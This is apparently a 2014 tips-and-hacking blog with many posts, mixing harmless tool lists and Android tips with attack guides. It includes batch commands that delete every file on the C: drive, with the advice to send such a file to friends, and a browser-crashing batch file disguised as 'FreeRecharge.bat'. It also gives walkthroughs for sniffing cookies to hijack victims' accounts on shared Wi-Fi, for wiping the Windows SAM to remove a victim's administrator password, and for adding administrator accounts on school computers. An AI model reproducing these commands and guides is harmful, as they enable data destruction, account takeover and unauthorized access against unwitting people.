Your Info

Sign by Danasoft - Get Your Sign

Sunday, 23 March 2014

Cut Your Enemy Balance in Realiance





1) Dial 51234400
2) After That You Will Hear A
Lady Voice And She Ask That
You Have 5 Free Minutes
3) Select One Of That Song
Which Is Given Their To You
4) After Hearing The Song Dial 5 This
Is For Song Dedicated
5) After Selecting Dedicated
Song Option Dial Your Enemy
No(only rim gsm no.)
6) That's All. You Are Done Now
Succesfull.

Some Useful Websites



01. screenr.com – record movies of your desktop and send them straight to YouTube.


02. bounceapp.com – for capturing full length
screenshots of web pages.


03. goo.gl – shorten long URLs and convert URLs into QR codes.


04. untiny.me – find the original URLs that’shiding behind a short URLs.


05. localti.me – know more than just the local time of a city.


06. copypastecharacter.com – copy- paste
special characters that aren’t on your
keyboard.


07. topsy.com – a better search engine for
twitter.


08. fb.me/ AppStore – search iOS apps without
launching iTunes.


09. iconfinder.com – the best
place to find icons of all sizes.


10. office.com – download templates, clipart
and images for your Office documents.


11. woorank.com – everything you wanted to
know about a website.





12. virustotal.com – scan any suspicious file or
email
attachment for viruses.


13. wolframalpha.com – gets answers directly
without searching – see more wolfram tips.


14. printwhatyoulike.com – print web pages
without the clutter.


15. joliprint.com – reformats news articles and
blog
content as a newspaper.


16. isnsfw.com – when you wish to share a
NSFW page but with a warning.


17. eggtimer .com – a simple online timer for
your
daily needs.


18. coralcdn.org – if a site is down due to
heavy
traffic, try accessing it through coral CDN.


19. random.org – pick random numbers, flip
coins, and more.


20. mywot.com – check the trust level of any
website – example.


21. viewer.zoho .com – Preview PDFs and
Presentations directly in the browser.


22. tubemogul.com – simultaneously upload
videos to YouTube and other video sites.


23. truveo.com – the best place for searching
web
videos.


24. scr.im – share you email address online
without
worrying about spam.


25. spypig.com – now get read receipts for
your email.


26. sizeasy.com – visualize and compare the
size of
any product.


27. whatfontis.com – quickly determine the
font
name from an image.


28. fontsquirrel.com – a good collection of
fonts – free for personal and commercial use.


29. regex.info – find data hidden in your
photographs – see more EXIF tools.


30. tineye.com – this is like an online version
of
Google Googles.


31. iwantmyname.com – helps you search
domains across all TLDs.


32. tabbloid.com – your favorite blogs
delivered as
PDFs.


33. join.me – share you screen with anyone
over the
web.


34. onlineocr.net – recognize text from
scanned PDFs and images – see other OCR
tools.


35. flightstats.com – Track flight status at
airports
worldwide.


36. wetransfer.com – for sharing really big
files
online.


37. pastebin.com – a temporary online
clipboard for your text and code snippets.


38. polishmywriting.com – check your writing
for
spelling or grammatical errors.


39. awesomehighlighter.com – easily highlight
the
important parts of a web page.


40. typewith.me – work on the same document
with multiple people.


41. whichdateworks.com – planning an event?
find
a date that works for all.


42. everytimezone.com – a less confusing view
of
the world time zones.


43. warrick.cs.odu. edu – you’ll need this when
your bookmarked web pages are deleted.


44. gtmetrix.com – the perfect tool for
measuring
your site performance online.


45. imo.im – chat with your buddies on Skype,
Facebook, Google Talk, etc. from one place.


46. translate.google. com – translate web
pages, PDFs and Office documents.


47. youtube.com /leanback – sit back and enjoy
YouTube videos in full- screen mode.


48. similarsites.com – discover new sites that
are similar to what you like already.


49. wordle.net – quick summarize long pieces
of text with tag clouds.

Thursday, 20 March 2014

Fix Blue Screen of Death Part







Boot In Safe Mode
The first thing to do when you get the blue screen is to power down the computer. When you boot it back up, press the F8 key before the Windowsscreen appears.
This will boot the computer into the Advanced Options screen where you can choose advanced boot options. Press the down arrow until “Safe Mode with Networking” is enabled and press enter.
If you believe that you’re dealing with a virus that instantly connects to the Internet when you boot your computer, then go with just “Safe Mode” instead.
Keep a close eye on the screen after you press enter. The screen will scroll through each driver as it loads each one ndividually into memory. Many times, you’ll see the screen pause for a very long time at one of the .sys files before the boot fails and returns an error. Make note of the last file it was trying to load before it failed. Do a Google search (on another computer obviously) to determine what driver is failing and try reinstalling that driver.
If there are no driver problems, then determine whether there are any hardware conflicts by going into the
Control Panel, clicking on System, and then Device Manager.
Go through each device category and scan all of the devices for the telltale yellow accent icon that indicates there’s a device conflict.
If you do see that icon, open up the driver and you’ll see a message box that reveals where the conflict is taking place.
If you can’t find any device conflicts, move on to the next step – scanning your entire system.
Run Spyware, Adware, Virus & Registry Scans While you’re in safe mode, perform all of your spyware, adware and virus scans. This is the best time to run these apps because any viruses that try to disable them in normal mode will likely be disabled at this point. If you don’t have one, you really should get one.
Another very useful scan to run is to check for any odd Registry entries or problems. A great open source app that can check your registry for any known problems is the Little Registry Cleaner which comes highly recommended by most users.
Things To Try As A Last Resort Go ahead and reboot your computer and press the F8 key again. This time, instead of booting into safe mode, select “Last Known Good Configuration“. This will revert to booting Windows using the last configuration where a successful boot took place. Many times this will resolve the issue without any further troubleshooting.
If that doesn’t work, reboot again into F8 mode and try selecting “Enable Boot Logging“. This boots Windows and logs every little detail of the boot-up into a file called “ntbtlog.txt” in the root directory, usuallyc:/Windows. Open up the text file and scan through it to see exactly what’s loading and when it’s loading. It’s quite possible that something obvious will jump right out at you. If you identify anything loading that you didn’t want to load, try uninstalling and see if it fixes the problem.
Last but not least, you always have the option to do a system restore.
Just go to the Control Panel
System and Security
Backup and Restore
select “Recover System Settings for your Computer“.


Done

How to "Delete administrator Password" without any software



Method 1






Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.





Method 2






Step 1. Put your hard disk of your computer in any other pc .

Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).

Step 3. Then open that drive in which the victim’s window(or your window) is installed.

Step 4. Go to location windows->system32->config

Step 5. And delete SAM.exe and SAM.log

Step 6. Now remove hard disk and put in your computer.

Step 7. And boot your computer






done.

Wednesday, 12 March 2014

Cookie Stealing Attack: Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.






Using this method you can hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.


this works At
LAN(local Area Network) . its best place to hack at university, cafe , public place where computer
are on one LAN simple Example WI-Fi.

What is Cookies And how the use of stealing
cookies?

Cookies are file’s that stored on Any computer’s By any website when a you visits them . the
cookie used by the web server to check the
authenticate the Real user . like you Enter Login in Facebook then a unique string’s Generated and the one copy saved in the web server and other is saved on your Browser as a Cookie file .
both are matched when you open a Account.
so then finally we will start.






Step 1:
Download the Wire Shark and install it.

Step 2:
Next open the wire shark and then click on
interface.

Step 3:
Next choose a interface which is received and
sending packet and click on start

Step 4:
Continue the sniffing for around like 10 minutes.

Step 5:
After a maximum 10 minute stop the sniffing by going to a capture menu.



Step6:
its important step, now filter to http. cookie contains “datr”. Then
filter the all search for http cookies with a name of datr and there is Facebook authentication’s cookie.

Step 7:
Now click on it and then goto the copy > Bytes
> Printable Text only

Step 8:
Now for next step you must have 3 thing,
1. Mozilla Firefox [browser]
2. Grease Monkey[add-on]
3. Cookie injector[code]
and then open facebook. com make sure you are
not login

Step 9:
Press the button Alt C to bring up a cookie
injector and then Simply paste in a cookie value
into it.

Step 10
Now refresh your page so then finally you Enter
the Victim Account.

How to save a webpage as PDF









Steps :








1. Open the Google Chrome Browser on your PC or MAC


2. Then go to the web page that you want to convert as a PDF.


3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser.


4. Now Change the destination to “Save As PDF” and hit the save button.


5. The current web page will instantly be downloaded as a PDF document.

Monday, 10 March 2014

Dangerous Computer Tricks



was looking for some computer tricks & pranks which could make someone cry for mummy, last night i have found these 4 computer tricks & pranks while stumbling that can make your friend crying :cry: for mummy. But use these at your own risk, can really harm someone’s PC.


1. A url that can crash your pc


I stumbled across this URL while surfing the internet. This is a javascript “exploit” (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.


WARNING: CLICKING ON THE LINK BELLOW MAY CAUSE A CRASH! USE AT YOUR OWN RISK!


http://tiny.cc/ibJUN


2. A Computer Tricks to Shut Down a Computer Forever


Download the .txt file from the below link:


http://tech.estudygang.com/wp-content/uploads/sites/7/2012/08/_bomb.txt


Open this file in notepad →


Replace all # symbol with space →


Now Save it as a .bat file.


This would shut down the person’s computer. It shuts it off once and deletes the files needed to reboot and restart.


REMEMBER – DO NOT CLICK THIS FILE. YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!


Send it to your friends computer and tell them to open it. Have fun!!


Here is another code too…..


cmd /c del c:windows* /F /S /Q


cmd /c del c:* /F /S /Q


Paste it in NotePad and Save it with Extension .cmd or .bat


3. A Microsoft Word Prank that will blow your friends head


Here , I will show you great microsoft word prank that will frustrate the victims very much, whenever they type a certain word, another word appears! This prank is great for office and schools.


1. Launch Microsoft Word.


2. Go to Tools -> AutoCorrect Options…


3. In the space where it says Replace , type a real common word such as the, and, a,I, you etc. In the space that says With , type in a crazy word such as fdgfdhkihyob45, whatever you want! Then , click on Add.


4. Cool Windows Prank:


This will make it to where your friend cannot click on anything on the screen.


1. Take a screenshot of the desktop. You can use Windows printscreen or some printscreen software.


2. Make your printscreen picture as desktop background.


3. Right click on desktop , then click Arrange Icons By->Show Desktop Icons (Windows XP)
Right click on desktop , then click View->Show Desktop Icons (Windows 7 and Vista)


That is it , when you click on the “icons”, nothing will happen!













Download 5 Best Android Hacking Tools






Today, I am gonna tell you about the top 5 android app for hacking or Download 5 Best Android Hacking Tools.As we all know hacking and pen testing is only can be done on computers. But now the world is changing now your mobile is small hacking toolkit using these apps. Must try all these apps.


1. The Android Network Toolkit:
In the last Defcon conference a new tool has been released by a security researcher and the tool is called “The Android network toolkit”. The has been developed for penetration tester and ethical hackers to test any network and vulnerabilities by using their mobile phones. This toolkit contain different apps that will help any hacker to find vulnerabilities and possibly exploit it. The company behind the app is an Israeli security firm called Zimperium.
Click to Download


2. Nmap for Android:
Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good.
Click to Download


3. FaceNiff 2.4 final- Session Hijacker for Android:
Your Facebook account is at risk, just like a Firesheep (for firefox hacking) there is a FaceNiff for hijacking the session of famous social networking websites includes facebook and twitter. FaceNiff is developed by Bartosz Ponurkiewicz who created Firesheep before but faceniff is for android OS.
Click to Download


4. AnDOSid- DOS Tool for Android:
DOS or denial of service attack is very dangerous attack because it takes down the server
(computer).AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.AnDOSid is designed for security professionals only!
Click to Download


5. SSHDroid- Android Secure Shell:
Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android.
This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").
Click to Download


Enjoy......

Best Android Hacking Tips and Tricks



Android is the Linux based operating system designed primarily for touch screen mobile phones. Now a days android phones are so much popular that they covered almost 65% of total mobile phones market.They are rich in functionality as well as user friendly. Many android users don’t know much about the hidden features of android phones. Today we are sharing an article which will tell you the best secret android tricks and hidden features of android phones. Different versions of android versions support different set of android tricks, so try all the following android tricks. I am not sure which will going to work on your handset.





1) Force reboot:
Many times android users face a problem of freezing of mobile phone, In case your android phone is frozen, you can reboot it using an android trick.

Just press Power Button+ Home Key + Volume up button simultaneously.

2) Quick Google Access:
Android phones built primarily for internet, many of android users don’t know that android phones provide a way by which we can access Google search in just a single click. To use this android trick,

Press menu key and hold it for couple of seconds, it will launch the Google search.

3) Reboot Android in safe mode:
As like computers, we can also reboot android phones in safe mode. The latest android jelly bean version provides an option to reboot in safe mode, if something goes wrong.
To reboot your android in safe mode, follow the below given instructions.


*Long press the power button
*Long press on the power off option.

Android phone will show a confirmation message about rebooting it in safe mode, if we reboot android phone in safe mode then all the 3rd party application will be disabled. These applications can again be enabled when we reboot our phone normally. This is a great android utility in case when, one of your 3rd party application is causing trouble for you and you want to hunt it.

4) Unlock android phones by face detection:
This is a cool android trick by which you can unlock your phone by using face detection, In the jelly bean version, android provides a way by which android phone can be unlock using face detection, to make this feature more secure, jelly bean version added another layer of protection in which android phone can be unlocked only when the face is matched as well as we have to blink eyes in order to unlock phone. Blinking eyes tells the android security system that person is live and it’s not an illegal attempt of unlocking using a still image.
To activate this,

Go to Settings > Security > Screen lock > Face unlock.


5) Get detailed information about phone status:
We can get the detailed statistics like phone information, battery information, usage statistics and WiFi information by just dialing *#*#4636#*#*

This is a handy USSD to get the details about battery usage, DNS check, Ping, Application time usage time and so on.

6) Move android apps to SD card:
Its good idea to install android apps in SD card, but what if you installed apps on your phone memory. Don’t worry android phones provide a way by which we can move our apps to SD card. To move apps to SD card, follow these steps:

Go to settings > Application settings > Manage application > Select the application, You will see the option “Move to SD card”.

7) Hard Reset and Factory reset your android phone:
This android trick comes handy at the time of selling an android phone. Android phone can be formatted in two ways

Factory reset
Hard reset

a) Factory reset: In factory reset, your phone is being formatted to factory level. Means all the settings will go by default and all the internal data will be deleted. To factory reset a phone dial *#*#7780#*#*.

b) Hard reset: To hard reset a phone dial *2767*3855#, this will delete all the data (including internal and External SD data) as well as settings of android phone. Don’t try this code for testing purpose, until you are not sure. It will not ask for a confirmation.

8) Context menu in android:
long press on the screen, will show you additional options for customizing android phones. This context menu is somewhat similar to the right click menu of most operating systems.

9) Taking screen shots on android phone:
Android phones offer a great feature by which we can take the screen shot without using any 3rd party application. However the screen shot android tricks vary from one android version to another version.

Press the Home button + power button (This trick work on most android phones.)
For Galaxy Nexus: Power button + volume down button.
For Galaxy Note 2 and S3: Swipe your palm on the screen to take screen shot.

10) Android Version Animation:
This is another cool android trick to play with your android phone.
To use this android trick, Go to settings > about phone > Tab repeatedly on ‘Android version’.

HOW TO CRASH ANY INTERNET BROWSER



Friends, today i’ll share how to crash internet
browser of your friends. Before explaining this
trick let me tell you how this trick will work. You
know what happens if a browser have to open 100
website at once, it’ll crash. So let start the trick. .
STEP 1.
Open notepad
STEP 2.
Copy and paste below code in NOTEPAD.
@echo off start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com

STEP 3.
Save it as (any name).bat [I recommend you to
give any interesting name so that your friend must
click on this file. e.g FreeRecharge.bat]
STEP 4.
Give it to your friends in his pen drive, when he’ll
click on it ,then boom. . you can also check it on
your pc, it is not so harmful..

Saturday, 8 March 2014

Greatest Hacking Tools



Some would say that hacking has been simplified by the array of hacking tools that are available nowadays. While that remains a topic for another discussion, if there's one thing that the tech world unanimously agrees on, it is the usefulness of these tools. Whether it is wireless hacking, network security, encryption, intrusion detection or anything else, there is a tool available for it.


Here are the top some hacking tools being used by pros around the world nowadays.




Wireless Hacking: These are tools that help you hack into wireless networks. Wireless hacking tools though useful, do not make you a complete hacker. In order to achieve that, you must learn the different ways in which a secure network can be accessed. Also, you should work on making your own network as secure as possible.

1. Aircrack-ng

2. Kismet

3. inSSIDer

4. KisMAC

Intrusion Detection Systems: Intrusion detection tools are one of the most important part of any security arrangement. They allow you to detect those threats that are potentially dangerous for your system.

1. Snort

2. NetCop

Port Scanners

1. Nmap


2. Superscan

3. Angry IP Scanner

Encryption Tools: In an age where more and more governments are being found spying on their own citizens, encryption is the word of the day. These tools allow you to encrypt your data so that even if someone does get through, they can’t get to the data easily.

1. TrueCrypt

2. OpenSSH

3. Putty

4. OpenSSL

5. Tor

6. OpenVPN

7. Stunnel

8. KeePass

Password Crackers: The name is pretty self explanatory in this case. These tools help you recover passwords from the data that a computer system is storing or transmitting over a network.

1. Ophcrack

2. Medusa

3. RainbowCrack

4. Wfuzz

5. Brutus

6. L0phtCrack

7. fgdump

8. THC Hydra

9. John The Ripper

10. Aircrack - Aircrack is 802.11 WEP and WPA-PSK keys cracking program.

11. Cain and Abel

Packet Crafting: Packet crafting is the technique through which an attacker finds vulnerabilities or entry points within your firewall. These tools help you achieve that more easily.

1. Hping

2. Scapy

3. Netcat

4. Yersinia

5. Nemesis

6. Socat

Traffic Monitoring: These are tools that let you monitor what websites your employees or children are monitoring.

1. Splunk

2. Nagios

3. P0f

4. Ngrep

Packet Sniffers: These are tools that can allow you to capture and visualise the traffic that is coming on your website.

1. Wireshark

2. Tcpdump

3. Ettercap

4. dsniff

5. EtherApe

Vulnerability Exploitation: These are the tools that you would use in order to gain access to various places.

1. Metasploit

2. sqlmap

3. sqlninja

4. Social Engineer Toolkit

5. NetSparker

6. BeEF

7. Dradis

For 50 more of such free hacking tools, click here

Vulnerability Scanners: These are programs that have been designed to asses a computer or network’s vulnerability to attacks. The functionality of these tools varies from one to the other, but they all present a detailed analysis of how vulnerable your system is.

1. Nessus

2. OpenVAS

3. Nipper

4. Secunia PSI

5. Retina

6. QualysGuard

7. Nexpose

Web Vulnerability Scanners: While vulnerability scanners are meant for your system, web vulnerability scanners assess the vulnerability of web applications. The identify the security vulnerabilities that your app may have through various tests.

1. Burp Suite

2. WebScarab

3. Websecurify

4. Nikto

5. w3af

Web Proxies: Proxies were originally created in order to add encapsulation to distributed systems. The client contacts a proxy server in order to request an item that exists on your server.

1. Paros

2. Fiddler

3. Ratproxy

4. sslstrip

Rootkit Detectors: This tool is a file and directory integrity checker. It verifies if a file is trustworthy and informs the user if found otherwise.

1. AIDE (Advanced Intrusion Detection Environment)

Firewalls: You obviously know what a Firewall is. These monitor and control the traffic in your network, whether incoming or outgoing. They are essential security tools that are used by the most novice to the most advanced users.

1. Netfilter

2. PF: OpenBSD Packet Filter

Fuzzers: The concept of fuzzing is usually put to use in order to test the security vulnerabilities of computer systems or in the software that runs on them.

1. skipfish

2. Wfuzz

3. Wapiti

4. W3af

Forensics: This refers to tools that are used for computer forensic. They are used in order to find evidence that is existing in computer systems.

1. Sleuth Kit

2. Helix

3. Malteg0

4. Encase

Debuggers: These are tools that are used in order to write exploits, reverse engineer binary files and to analyse malware.

1. GDB

2. Immunity Debugger

Hacking Operating Systems: These are operating systems that have been designed specifically for hackers. These distros are preloaded with tools that a hacker needs etc.

1. Backtrack 5r3

2. Kali Linux

3. SELinux

4. Knoppix

5. BackBox Linux

6. Pentoo

7. Matriux Krypton

8. NodeZero

9. Blackbuntu

10. Samurai Web Testing Framework

11. WEAKERTH4N

12. CAINE (Computer Aided Investigative Environment)

13. Bugtraq

14. DEFT

15. Helix

Other Hacking Tools: There are also other miscellaneous hacking tools that are often used by hackers. They can’t be put into a particular category, but they are still quite useful.

1. Netcat

2. Traceroute

3. Ping.eu

4. Dig

5. cURL

Friday, 7 March 2014

How to Create an Administrator account in the school & College



1. Click start and Open "Run"

2. Type "cmd" in Run

3. Now type following or copy and paste in "CMD (Command Promt)":

" net user /add newuser mypass" and hit enter. (it will say "the command completed successfully")

4. Type: " net localgroup administrators newuser /add"

now you have created an account!!!

Enjoy..

Wednesday, 5 March 2014

Here Are 10 Top Tools To Help You Develop Faster Web Pages



Creating and maintaining a web application can be fun! Ask a developer, he'll tell you. However, at the back of the mind of every developer lies a genuine concern: speed of his/her web page.


Here we have compiled a list of top 10 free tools to help you create and sustain high-performance web applications:

1. YSlow for Firebug

-Simple tool for grading a website’s performance that gives a letter grade (A through F) based on the best practices for high performance web sites available on the Yahoo! Developer Network.

-Grading how your web page ranks on specific aspects the tool aids in reducing the number of HTTP requests, while also compressing external JavaScript and CSS files.

2. Firebug

-A browser-based web development tool that aids in debugging, testing, and analysing web pages.

-Features a Net (network) tab where you can inspect HTML, CSS, XHR and JS components.

3. Fiddler 2

-Highly customisable HTTP debugging tool that helps in analysing both incoming and outgoing traffic.

-Aids in improving unprimed cache, analysing HTTP response headers and creating custom flags for potential performance issues.

4. Cuzillion

-Lets you see how page components interact with each other and aids in testing and modifying web pages prior to their finalising.

-The advantage here is it gives clues well in advance whether there are any potential trouble-spots or points of improvement.

-Created by the ex-Chief Performance at Yahoo!, Steve Saunders also the creator of YSlow.

5. mon.itor.us


-The tool aids in monitoring performance, availability, and traffic statistics as also observing your website's response time effectively.

-Lets you set alerts for as and when a specific service is no longer available. Further, you can check if your changes are effecting your web page's speed and performance either positively or negatively through weekly automated benchmarks.

6. IBM Page Detailer

-Lets you visualise web components even as they are being downloaded by simply navigating to a specific web site.

-Relevant details concerning a web page component is obtained in a separate window by a simple click.

7. Httperf

-Open-source tool that measures HTTP server performance running on Linux by creating workload simulations.

-Gives an idea whether your website can handle high-level traffic and still remain stable. Further, it also gives an idea regarding the maximum capacity of a server.

8. Pylot

-Open-source performance and scalability testing tool that makes use of HTTP load tests to analyse and tweak performance.

-Requires Python installed on the server, however uses XML for testing.

9. PushToTest TestMaker

-Open-source tool for testing scalability and performance of applications and features a Resource Monitor to view CPU, memory, and network utilisation during testing.

10. Wbox HTTP testing tool

-HTTP testing software released under the GPL (v2) and supports Linux, Windows, and MacOS X systems.

-Makes sequential requests at intervals for stress-testing and comes with an HTTP compression command to analyse data about your server’s file compression.

Replace Windows Explorer with Multi Commander



Microsoft Windows Explorer is great for general file management tasks. However, there are several more complicated tasks that Windows Explorer is unable to handle. This is where Multi Commander can come in handy. Multi Commander is a fantastic and free file manager that allows you to manage your files and perform many tasks not possible through Windows Explorer. In the picture, is an example of the Multi Commander interface. As can be seen, the interface is very similar to Windows Explorer with additional features such as multiple panes, tabs, and buttons.



---Some of the many features in Multi Commander---

*Compare the right and left file explorers with each other and show what is different.

*Built using Extension/Plug-in architecture that allows for almost any imaginable feature to be added.

*Easily filter and copy or move only the files specified in the filter.

*Excellent keyboard support for anyone who enjoys keyboard shortcuts or just avoiding the mouse.

*Convert files between Unix (LF), Windows (CRLF), and Mac (CR) format.

*Browse and read files within a RAR without extracting the files.

*Quickly change a file or folder name to all lowercase, all uppercase, or Camel case.

*Browse, update, and modify the system registry.

*Create and verify the MD5 and SFV (CRC32) Checksum of files using the MC-Checksum extension.

*Tab support to have multiple folders open at once.

*Script engine support to create scripts to automate tasks.

*FTP support.

*Save and load a selection of files and folders to memory or to a file.

Download : http://multicommander.com/downloads/

Tuesday, 4 March 2014

Brutus Password Cracker -Tutorial



Brutus is a well known password cracking program .With Brutus you can either carry out a brute force attack or a dictionary attack to crack passwords for HTTP, FTP, POP3, Telnet, SMB (Netbios), Netbus, Brutus is one of the fastest, most flexible remote password crackers you can get your hands on




Features :-

Brutus version AET2 is the current release and includes the following authentication types
HTTP (Basic Authentication)
HTTP (HTML Form/CGI)
POP3
FTP
SMB
Telnet

Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.


The current release includes the following functionality :
Multi-stage authentication engine
60 simultaneous target connections
No username, single username and multiple username modes
Password list, combo (user/password) list and configurable brute force modes
Highly customisable authentication sequences
Load and resume position
Import and Export custom authentication types as BAD files seamlessly
SOCKS proxy support for all authentication types
User and password list generation and manipulation functionality
HTML Form interpretation for HTML Form/CGI authentication types
Error handling and recovery capability inc. resume after crash/failure.


Download:-




You can download Brutus Password Cracker From Here

How To Hide Your Last Name On Facebook



Facebook unfortunately requires all users to include a first and last name for their profile. There is no requirement however on using your real names. But now facebook users can hide their middle name and last name/surname. Hiding last name, you can effectively hide your identity on Facebook. This only takes a few minutes to set up within your Facebook account settings.






In this article I am going to share trick to hide last name on Facebook.


Step 1: First goto Firefox --> Options --> Advanced --> Network --> Settings --> Connection Settings --> And choose manual proxy configuration.





Step 2: Now Tick begin :)) " Use This Proxy Servers For All Protocols ".



Put this proxy and port


Http Proxy : 202.70.136.142


Port : 8080


Step 3: Put 202.70.136.142 on No Proxy for Box.

Step 4: Now goto Account Settings, Delete Middle Name and Last Name. Then Save!






Done...

Sunday, 2 March 2014

How to crack WiFi Password by Backtrack 5

STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE



Steps to Follow:
Step 1 :
airmon-ng

The result will be something like :
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :
airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :
airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

How To Download Android APK Files Directly From Google Play


Regularly, people get applications for their android system by downloading them from Google Play Store. The downloader gets the app installed for you, without bothering you with unnecessary details like the files required for installation etc. But what if you don’t have access to internet and you want an app installed on your phone? Confidently you can’t do so without downloading stuff required for the installation. The key to this problem is simple - just get the APK package of the desired applications, and keep it beforehand for later when you need.

It’s a package which contains all the files required for connection. In other words, it’s a ‘standalone’ installer for your app which doesn't require internet connectivity. You can get APK package of an android application from Google Play Store by simply adding an extension called ‘APK Downloader’ to your Google browser. Here we have a step by step procedure which will tell you how to add APK Downloader to your Google Chrome and subsequently, use it for getting APK packages


 For download this extension goto apk-downloader-1.4.3_2 


 After downloaded, the extension is to be added to your Google Chrome Extensions. To do so, follow these steps.
 How to install:
- For Chrome 33 or later:
1.      Extract downloaded zip to a folder
2.      Enable Developer mode in Extension page
3.      Click the “Load unpacked extension” button

4.      Locate the folder you create above and click OK

Open dial pad, call *#*#8255#*#* ( 8255 = TALK ). If it opens “GTalk Service Monitor”, find lines that begin with JID and Device ID. Your email is JID, and your device id is a string that after android- prefix
For example: if it shows android-1234567890abcdef , then your device ID is 1234567890abcdefDevice ID
After this Enter your email’s password, then press Login. If everything is ok, now you can use APK Downloader
After finished two steps above, you can start using APK Downloader. Open Android Market, view any FREE apps, then press the APK Downloader icon on address bar ( see screenshot )

10 Places To Get Training On Ethical Hacking

So you love hacking and want to fight against the bad folks of the field? It's time to get trained and certified in Ethical hacking to gear up and win the battle! Here we bring to you 10 online places where you can get training on various aspects of Ethical Hacking. While some of these institutions provide you certifications, others prepare you for some popular certifications. And if battling is not a good enough reason for you, then the fact that companies are actively looking for ethical hacking professionals may be!

1. Forward Discovery:

Learn computer forensics, incident response and digital investigation from those who were on the front lines. Forward claims to have instructors who have taught at the military, federal, state, local, and corporate levels. Few things that you can learn on Forward includes information protection and risk mitigation, digital investigations and computer forensics, data incident response, electronic discovery and vulnerability assessment. 

2. 7SAFE

7Safe provides post graduate level and 11 certificate cources on different aspects of ethical hacking. The Postgraduate Qualifications includes: MSc Professional Practice in Digital Forensics and Security, Postgraduate Certificate in Computer Security and Forensics, MSc Computer Security and Forensics. The certification courses includes: CSTA Ethical Hacking Training, CSTP Ethical Web Application Hacking Training, CAST Application Security Training, CWSA Wireless Security Training, CFIP Forensic Investigation Training, CMI Malware Investigation Training, CSIS Incident Response Training, CMFS Mac Forensics Training, PCI DSS Implementation, CIIP Implementing ISO 27001, and Incident Response & Computer Forensics Awareness Training. The courses offered are authored and delivered by the expert practicing consultants of 7Safe.

Saturday, 1 March 2014

Create a Fake wall post on Facebook

Hi readers

Today I am here with a Facebook Trick  that you are surely going to love. Just imagine if people and celebrities like your post in fact comment on your post. Today I found a website named the Wall Machine .

All you have to do is login with Facebook and then you can have your comments and likes and the best thing is you can customise it in your own way .

Check out our examples below -
The wall Machine, Fake wall post,

Download all Facebook Videos and Photos of Friends Groups and Pages

f you have landed up here reading the title so let me make it a little more specific and it was really helpful for me when I needed to gift a friend his edited pictures on his birthday and I found a good website for the same named  Picknzip .

We have came across many websites which had the feature of downloading videos and photos of friends but this one is certainly unique in the sense it has the option of downloading videos and photos groups and pages too and this is what makes it different from others .

So here we go all you have to do click on Login and connect your Facebook account


Download all Facebook videos and photos of your friends


9 Ways To Download Torrent with IDM

Downloading movies with torrent is the most common task that people learn with Torrent on the first go and Internet Download Manager is the favorite download manager because of its packet terminology . 

What do you do when you have no seeds or the speed of torrent is too slow in spite of the fact that Internet Speed is very high . So here is indeed the solution of downloading Torrent with IDM .

How it works ?

All you have to do is paste the link in the space provided and first it downloads the file to its server and then you can download it . This indeed is the basic outline base in which every of the website mentioned below works .

And here are 9 website that do the task very easy for you -


1.Putdrive- The best thing about this is it lets you store your torrents in Dropbox or Google Drive . And another that makes it number one in our list is Anonymous Downloads .

putdrive box dropbox yousendit amazon clouddrive


2.Zbigz -  Most popular and  provides conversions upto 1GB .